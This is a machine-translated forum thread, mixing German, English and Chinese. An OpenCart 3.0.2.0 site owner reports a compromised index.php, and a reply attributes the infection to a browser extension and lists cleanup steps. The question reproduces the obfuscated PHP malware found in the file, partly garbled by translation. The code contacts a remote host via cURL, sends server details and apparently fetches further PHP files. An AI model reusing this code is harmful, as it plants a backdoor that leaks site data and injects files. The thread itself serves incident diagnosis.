Opencart index.php-Datei beschädigt

Question

Ich verwende opencart v3.0.2.0 und das Problem besteht darin, dass die Datei index.php von opencart (der Einstiegspunkt zu meiner Opencart-Website, hochgeladen in das Verzeichnis public_html) abstürzt (der Code in der Datei index.php hat in seltsame Zeichen geändert). Das ist letzte Woche zweimal passiert. Ich hatte keine Ahnung, dass jemand gehackt wurde oder dass etwas mit meiner Domain oder meinem Code nicht stimmte. Wenn mir jemand helfen oder mich anleiten kann, lassen Sie es mich bitte wissen. Danke.

Beschädigte index.php-Datei:

Global $O; $O=URL-Dekodierung ($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9 ].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65]. $O[67].$O[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O [67].$O[65] .$O[63].$oOooOO.$O[63];FunctionooooooooOOOOOOOOoooooOOO($ooooOOOoOoo){ $ooooOOOooOo=curl_init();curl_setopt($ooooOOOooOo,CURLOPT_URL,$ooooOOOoOoo); curl_setopt ($ooooOOOooOo,CURLOPT_RETURNTRANSFER,1);curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $ooooOOOOooO =curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $ooooOOOOooO; } Funktion ooOOoOOO($Ooo ooO,$Ooo oooo= array()){ global $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOooooO, CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooOO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO, CURLOPT_POST, 1); _POSTFIELDS, http_build_query($ OOOOoo));$OOOOooo=curl_exec($OOooooO);$OOOOooooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOooooOO){return false ;}return $OOOOooo ;} function oooOOOo( $ooOOo){global$O;$ooOOOOo = false;$ooooooo = $O[14].$O[8].$O[8].$O[14]. ].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O[14]. $O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8].$O [90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10]. ];if ($ooOOo!=''){if (preg_match("/($ooooooOOo)/si",$ooOOo)){$ooOOOOo=true;}} returns $ooOOOOo;} function oooOOooOOoOO ($oOOOOOOoOOOO){ Global$O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O [59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[5].$O[10 ].$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O[16]. $O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O [59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO )) {$ooOOOOOOoO =true;}Return $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[ 35].$O [37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[13].$ O[13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63].$O [63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63] );$oOoooOOoOO= $_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOoooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOooooOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$ O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[ 9];$ooooOOOOoooOOOooO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$ O[9]。$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[ 12].$O [11].$O

Answer 1

I recently encountered a similar issue with one of my clients. Upon investigation, we found that the problem was caused by a Chrome browser extension that injects code into PHP files when uploading any php files through the browser (like Cpanel File Management). In this case, the code was injected into the index.php file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using the cURL function in PHP.

要解决此问题，您可以采取以下步骤：

1- 截取浏览器中用于将文件上传到服务器的所有扩展程序的屏幕截图，与我们共享，然后删除浏览器或其所有扩展程序。

2- 检查自黑客事件发生之日起上传或更新到服务器的所有文件。您可以在服务器上运行命令来获取新文件或更新文件的列表，具体取决于您的操作系统。

3- You may find some *.php files in the .well-known or other hidden folders on the server.

4- 使用防病毒软件保护您的操作系统。我建议使用非免费防病毒软件，例如卡巴斯基。

您能否分享您的浏览器扩展程序的屏幕截图，以便我们确定哪个扩展程序可能导致网站遭到黑客攻击？